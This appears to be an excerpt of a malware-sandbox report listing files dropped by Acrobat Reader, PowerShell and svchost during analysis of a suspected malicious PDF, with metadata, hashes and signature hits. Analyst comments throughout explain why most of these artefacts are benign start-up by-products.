File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Category: dropped
Dump: DC_Reader_Disc_LHP_Banner.5.dr
ID: dr_24
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.282184958973457
Encrypted: false
Ssdeep: 6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJf8dPeUkwRe9:YvXKXavzKvR/ZwHAOZGU8Ukee9
Size: 289
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Category: dropped
Dump: DC_Reader_Disc_LHP_Retention.5.dr
ID: dr_26
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.2813377572537625
Encrypted: false
Ssdeep: 6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfQ1rPeUkwRe9:YvXKXavzKvR/ZwHAOZGY16Ukee9
Size: 292
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Category: dropped
Dump: DC_Reader_Edit_LHP_Banner.5.dr
ID: dr_13
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.298419009797501
Encrypted: false
Ssdeep: 6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfFldPeUkwRe9:YvXKXavzKvR/ZwHAOZGz8Ukee9
Size: 289
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Category: dropped
Dump: DC_Reader_Home_LHP_Trial_Banner.5.dr
ID: dr_27
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.310093092406178
Encrypted: false
Ssdeep: 6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfzdPeUkwRe9:YvXKXavzKvR/ZwHAOZGb8Ukee9
Size: 295
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Category: dropped
Dump: DC_Reader_More_LHP_Banner.5.dr
ID: dr_25
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.2908218449850075
Encrypted: false
Ssdeep: 6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfYdPeUkwRe9:YvXKXavzKvR/ZwHAOZGg8Ukee9
Size: 289
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
Category: dropped
Dump: DC_Reader_RHP_Banner.5.dr
ID: dr_5
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.276710630571702
Encrypted: false
Ssdeep: 6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJf+dPeUkwRe9:YvXKXavzKvR/ZwHAOZG28Ukee9
Size: 284
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Category: dropped
Dump: DC_Reader_RHP_Intent_Banner.5.dr
ID: dr_12
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.274432022762068
Encrypted: false
Ssdeep: 6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfbPtdPeUkwRe9:YvXKXavzKvR/ZwHAOZGDV8Ukee9
Size: 291
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Category: dropped
Dump: DC_Reader_RHP_Retention.5.dr
ID: dr_6
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.273643798218384
Encrypted: false
Ssdeep: 6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJf21rPeUkwRe9:YvXKXavzKvR/ZwHAOZG+16Ukee9
Size: 287
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Category: dropped
Dump: DC_Reader_Sign_LHP_Banner.5.dr
ID: dr_29
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.6669617300510655
Encrypted: false
Ssdeep: 24:Yv6XabKJhjamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS1:YvBKJhTBgkDMUJUAh8cvM1
Size: 1090
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Category: dropped
Dump: DC_Reader_Upsell_Cards.5.dr
ID: dr_9
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.2499150266380985
Encrypted: false
Ssdeep: 6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJfshHHrPeUkwRe9:YvXKXavzKvR/ZwHAOZGUUUkee9
Size: 286
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
Category: dropped
Dump: Edit_InApp_Aug2020.5.dr
ID: dr_7
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.27389748687245
Encrypted: false
Ssdeep: 6:YEQXJ2HXaVWP8z14vB3/dVlPIHAR0YCqoAvJTqgFCrPeUkwRe9:YvXKXavzKvR/ZwHAOZGTq16Ukee9
Size: 282
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
Category: dropped
Dump: TESTING.5.dr
ID: dr_20
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: data
Entropy: 0.8112781244591328
Encrypted: false
Ssdeep: 3:e:e
Size: 4
Whitelisted: true
Reputation: timeout

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
Category: dropped
Dump: SOPHIA.json.5.dr
ID: dr_15
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: JSON data
Entropy: 5.144514633571514
Encrypted: false
Ssdeep: 24:YjE5lm/a4fBayen6K3/Jv1GymP/8+NjPjj0S/Agj2v2LSxCL7q8QPZ2xm85M699U:YKxnp/J0ymn8MPvseq7m7q8QPZ0+699U
Size: 2814
Whitelisted: false
Reputation: timeout

SOPHIA is Acrobat's in-product messaging cache; these JSON records are downloaded definitions for the upsell banners and cards the Reader UI shows, written by Acrobat.exe on start-up and unrelated to the sample. The near-identical ssdeep prefixes across the 280-to-295-byte files reflect their shared template.

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
Category: dropped
Dump: SharedDataEvents.5.dr
ID: dr_19
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
Entropy: 1.3196258482785053
Encrypted: false
Ssdeep: 48:TGufl2GL7ms9WR1CPmPbPahuCeypilIoC4:lNVms9WfMwbPahxe44
Size: 12288
Whitelisted: false
Reputation: timeout

Signature Hits | Behavior Group | Mitre Attack
Creates files inside the user directory | System Summary | -

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
Category: dropped
Dump: SharedDataEvents-journal.5.dr
ID: dr_18
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: SQLite Rollback Journal
Entropy: 1.7792104846296901
Encrypted: false
Ssdeep: 48:7MVWR1CPmPbPahuCHypilIgqFl2GL7mse:7MWfMwbPahxHJKVmse
Size: 8720
Whitelisted: false
Reputation: timeout

Signature Hits | Behavior Group | Mitre Attack
Creates files inside the user directory | System Summary | -

File: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin
Category: dropped
Dump: UserCache64.bin.5.dr
ID: dr_23
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: data
Entropy: 5.392739213842091
Encrypted: false
Ssdeep: 768:RNOpblrU6TBH44ADKZEgnQnb3Q+b/1DeYjC+Qji1BKbac9Yyu:6a6TZ44ADEnQnb3JbdqaKb39K
Size: 66726
Whitelisted: false
Reputation: timeout

The SharedDataEvents SQLite store, its rollback journal and UserCache64.bin are all written by Acrobat.exe under its own profile directory; the "Creates files inside the user directory" hit is the generic signature any application writing to %LOCALAPPDATA% triggers.

File: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Category: dropped
Dump: StartupProfileData-NonInteractive.4.dr
ID: dr_3
Target ID: 4
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type: data
Entropy: 1.1940658735648508
Encrypted: false
Ssdeep: 3:NlllulnmWllZ:NllUmWl
Size: 64
Whitelisted: false
Reputation: timeout

PowerShell writes this 64-byte start-up profile cache itself on every launch. The NonInteractive suffix corroborates the "Non Interactive PowerShell Process Spawned" hit on the invoice.pdf entry, but the file carries no attacker content.

File: C:\Users\user\AppData\Local\Temp\MSI26d80.LOG
Category: dropped
Dump: MSI26d80.LOG.5.dr
ID: dr_10
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy: 3.488809521505088
Encrypted: false
Ssdeep: 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88Cl4:Qw946cPbiOxDlbYnuRKdl
Size: 246
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bau2ic1w.lsv.ps1
Category: dropped
Dump: __PSScriptPolicyTest_bau2ic1w.lsv.ps1.4.dr
ID: dr_0
Target ID: 4
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type: ASCII text, with no line terminators
Entropy: 4.038920595031593
Encrypted: false
Ssdeep: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size: 60
Whitelisted: false
Reputation: timeout

Signature Hits | Behavior Group | Mitre Attack
Creates temporary files | System Summary | -

File: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfvqxs35.ti4.psm1
Category: dropped
Dump: __PSScriptPolicyTest_kfvqxs35.ti4.psm1.4.dr
ID: dr_1
Target ID: 4
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type: ASCII text, with no line terminators
Entropy: 4.038920595031593
Encrypted: false
Ssdeep: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size: 60
Whitelisted: false
Reputation: timeout

PowerShell creates these two 60-byte files on start-up to test whether an AppLocker or WDAC script policy applies to .ps1 and .psm1 files, which is why both have the same size, entropy and ssdeep. The "Creates temporary files" hit is a by-product of launching powershell.exe, not of anything the dropper wrote; the file worth recovering from target ID 4 is the command line or script it was started with.
|
|
File: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 00-20-08-613.log
Category: dropped
Dump: NGLClient_AcrobatReader123.6.20320.6 2025-01-11 00-20-08-613.log.5.dr
ID: dr_17
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: ASCII text, with very long lines (393)
Entropy: 5.33860678500249
Encrypted: false
Ssdeep: 384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
Size: 16525
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Category: dropped
Dump: NGLClient_AcrobatReader123.6.20320.6.log.5.dr
ID: dr_14
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: ASCII text, with very long lines (393), with CRLF line terminators
Entropy: 5.3585016293895364
Encrypted: false
Ssdeep: 384:aEuZG4HXEv+kdej8XcsByEDKWRQjf2KUQ7F5/jfNInHV/y74eDsku/ubqdLi67Dt:+3o
Size: 15114
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
Category: dropped
Dump: acroNGLLog.txt.5.dr
ID: dr_16
Target ID: 5
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Type: ASCII text, with CRLF line terminators
Entropy: 5.399126608706253
Encrypted: false
Ssdeep: 192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbOcbcIy8cbx:ceo4+rsCDyD
Size: 29752
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Temp\acrocef_low\20ad2ce3-81ea-4adb-966e-e93fa25f5162.tmp
Category: dropped
Dump: 20ad2ce3-81ea-4adb-966e-e93fa25f5162.tmp.8.dr
ID: dr_36
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
Entropy: 7.97605879016224
Encrypted: false
Ssdeep: 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLrGZkwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLrGZx
Size: 1407294
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Temp\acrocef_low\343b5dac-c6fe-4369-bbfa-cea00177a89e.tmp
Category: dropped
Dump: 343b5dac-c6fe-4369-bbfa-cea00177a89e.tmp.8.dr
ID: dr_38
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Entropy: 7.9736851559892425
Encrypted: false
Ssdeep: 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
Size: 386528
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Temp\acrocef_low\3fdaeb30-1cdd-4a3f-be45-3fe9125f4733.tmp
Category: dropped
Dump: 3fdaeb30-1cdd-4a3f-be45-3fe9125f4733.tmp.8.dr
ID: dr_41
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Entropy: 7.976496077007677
Encrypted: false
Ssdeep: 24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru
Size: 1419751
Whitelisted: false
Reputation: timeout

File: C:\Users\user\AppData\Local\Temp\acrocef_low\edd67467-a04b-4dfc-a97e-ed8ec6fd7075.tmp
Category: dropped
Dump: edd67467-a04b-4dfc-a97e-ed8ec6fd7075.tmp.8.dr
ID: dr_37
Target ID: 8
Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Type: gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Entropy: 7.98639316555857
Encrypted: false
Ssdeep: 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
Size: 758601
Whitelisted: false
Reputation: timeout

File: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Category: dropped
Dump: Download-1.tmp.9.dr
ID: dr_52
Target ID: 9
Process: C:\Windows\System32\svchost.exe
Type: JSON data
Entropy: 4.306461250274409
Encrypted: false
Ssdeep: 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
Size: 55
Whitelisted: false
Reputation: timeout

Signature Hits | Behavior Group | Mitre Attack
Creates files inside the system directory | System Summary |
